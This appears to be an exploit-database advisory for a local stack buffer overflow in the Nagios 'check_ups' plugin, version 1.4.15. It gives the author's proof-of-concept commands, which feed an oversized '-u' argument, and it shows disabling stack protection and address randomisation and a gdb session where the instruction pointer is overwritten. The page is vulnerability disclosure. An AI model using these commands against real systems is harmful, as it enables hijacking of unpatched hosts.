Nagios Plugin 'check_ups' local buffer overflow

vendor:

Nagios Plugins

by:

Stefan Schurtz

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Nagios Plugins

Affected Version From: Nagios-plugins-1.4.15

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:nagios:nagios_plugins

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2009

Nagios Plugin ‘check_ups’ local buffer overflow

A buffer overflow vulnerability was discovered in the Nagios Plugin 'check_ups' which can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused due to a boundary error when handling user-supplied input. By supplying a specially crafted argument to the '-u' option, an attacker can cause a stack-based buffer overflow and gain control of the execution flow of the application.

Mitigation:

Compile the application with stack protection and randomize the virtual address space.

Source

Exploit-DB raw data:

#################################################################
# Advisory:			Nagios Plugin 'check_ups' local buffer overflow
# Author:				Stefan Schurtz
# Contact:			s.schurtz@infoserve.de
# Affected Software:		Successfully tested on nagios-plugins-1.4.15
# Vendor URL:			http://nagiosplugins.org/
#################################################################

./check_ups -u `perl -e 'print "A"x16407'`
*** buffer overflow detected ***: ./check_ups terminated
======= Backtrace: =========
/lib/libc.so.6(__fortify_fail+0x50)[0x25d970]
/lib/libc.so.6(+0xe486a)[0x25c86a]
/lib/libc.so.6(+0xe3fa8)[0x25bfa8]
/lib/libc.so.6(_IO_default_xsputn+0x9e)[0x1e2a2e]
/lib/libc.so.6(_IO_vfprintf+0x36b2)[0x1b88c2]
/lib/libc.so.6(__vsprintf_chk+0xad)[0x25c05d]
/lib/libc.so.6(__sprintf_chk+0x2d)[0x25bf9d]
./check_ups[0x8049e66]
./check_ups[0x804a105]
./check_ups[0x804a4ce]
/lib/libc.so.6(__libc_start_main+0xe7)[0x18ece7]
./check_ups[0x80491a1]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 660177     /lib/ld-2.12.1.so
0012c000-0012d000 r--p 0001b000 08:01 660177     /lib/ld-2.12.1.so
0012d000-0012e000 rw-p 0001c000 08:01 660177     /lib/ld-2.12.1.so
0012e000-0012f000 r-xp 00000000 00:00 0          [vdso]
0012f000-00142000 r-xp 00000000 08:01 660186     /lib/libnsl-2.12.1.so
00142000-00143000 r--p 00012000 08:01 660186     /lib/libnsl-2.12.1.so
00143000-00144000 rw-p 00013000 08:01 660186     /lib/libnsl-2.12.1.so
00144000-00146000 rw-p 00000000 00:00 0

// Compile without stack protection

sysctl -w kernel.randomize_va_space=0

cd plugins/

gcc -fno-stack-protector -z execstack -DNP_VERSION=\"1.4.15\" -g -o check_ups check_ups.c netutils.o utils.o -L/usr/src/nagios-plugins-1.4.15/plugins ../lib/libnagiosplug.a ../gl/libgnu.a -DLOCALEDIR=\"/usr/local/nagios/share/locale\" -I../lib -I../gl -I../intl -I..

// next test

./check_ups -u `perl -e 'print "A"x16408'`
Connection refused
Invalid response received from host
Segmentation fault

(gdb) run -u `perl -e 'print "A"x16408'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/src/nagios-plugins-1.4.15/plugins/check_ups -u `perl -e 'print "A"x16408'`
Connection refused
Invalid response received from host

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0x2914e0 2692320
edx            0x292360 2696032
ebx            0x41414141       1094795585
esp            0xbfff56f0       0xbfff56f0
ebp            0x41414141       0x41414141 <--- AAAA
esi            0x0      0
edi            0x0      0
eip            0x41414141       0x41414141 <--- AAAA
eflags         0x10286  [ PF SF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51